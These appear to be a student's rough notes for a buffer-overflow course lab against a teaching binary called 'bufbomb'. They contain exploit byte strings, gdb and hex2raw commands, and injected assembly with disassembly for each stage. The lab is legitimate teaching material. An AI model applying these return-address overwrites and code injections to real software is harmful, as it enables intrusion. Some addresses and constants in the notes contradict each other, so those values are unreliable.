pehujemi Cookie:
	0x53da1d9f
	
SMOKE:	
	08 04 8b 98
	98 8b 04 08
	
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa988b0408
	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccdddd
	
	> cd ...
	> perl -e 'print "AA "x32 ,"BB "x4, "CC "x4, "DD "x4 , "98 8b 04 08" '> hex
	> ./hex2raw < hex > raw
	> gdb bufbomb
	(gdb) r -u pehujemi < raw
	
FIZZ:
	53 da 1d 9f
	9f 1d da 53 
	
BANG:
	08 04 8c 1d
	1d 8c 04 08
	NOTERS: GLOBAL VAR : 0x804d100
	
(pehujemi.s)
	movl 0x9f1dda53, 0x804d100
	pushl 0x1d8c0408
	ret
	
	> gcc -m32 -c assembly.s
	> objdump -d assembly.o > assembly.d
	> cat assembly.d
		Cat output:
			assembly.o: file format elf32-i386
			Disassembly of section .text:
 
		0:	c7 05 00 d1 04 08 53 	movl   $0x9f1dda53,0x804d100
		7:	da 1d 9f 
		a:	68 08 04 8c 1d       	push   $0x1d8c0408
		f:	c3                   	ret
	
	"Start of Implemented assemble code"
	55 68 35 a8
	a8 35 68 55
	
TEST:
	08 04 8d 2a
	2a 8d 04 08
	
	EAX  0x5dff052b
	Getbuf returns to test at here: 0x08048d3e
	
	movl  $0x53da1d9f , %eax  #Move cookie into %eax
	movl  $0x556835d0 , %ebp  #Restore original %ebp value. 
	pushl $0x08048d3e         #Push address of where getbuf() would normally return to. 
	ret
	
	gcc -m32 -c pehujemi2.s
	objdump -d pehujemi2.o

	pehujemi2.o:     file format elf32-i386
	Disassembly of section .text:
	00000000 <.text>:
		0:	b8 9f 1d da 53       	mov    $0x53da1d9f,%eax
		5:	bd 2b 05 ff 5d       	mov    $0x5dff052b,%ebp
		a:	68 3e 8d 04 08       	push   $0x8048d3e
		f:	c3                   	ret
		
	EBP 0x556835d0
	ESP 0x556835a8
	
	x/20x esp
	
	0x556835e8
TESTN
	lea 0x28 (%esp)   , %ebp # restore ebp register contents
	movl  $0x53da1d9f , %eax # returns the cookie value
	pushl $0x8048dba         # return address pointing instruction after getbufn() call in testn()
	ret
	
	Disassembly of section .text:

	00000000 <.text>:
		0:	8d 6c 24 28          	lea    0x28(%esp),%ebp
		4:	b8 9f 1d da 53       	mov    $0x53da1d9f,%eax
		9:	68 ba 8d 04 08       	push   $0x8048dba
		e:	c3                   	ret  
		
	print /x ($ebp - 0x208)
	$1 = 0x55683398
	$2 = 0x55683388
	$3 = 0x556833f8
	$4 = 0x55683408
	$5 = 0x55683348
	
	r -nu pehujemi < pehujemi_raw_nitro
	8d 6c 24 28 b8 9f 1d da 53 68 ba 8d 04 08 c3 00 00 00 00 08 34 68 55 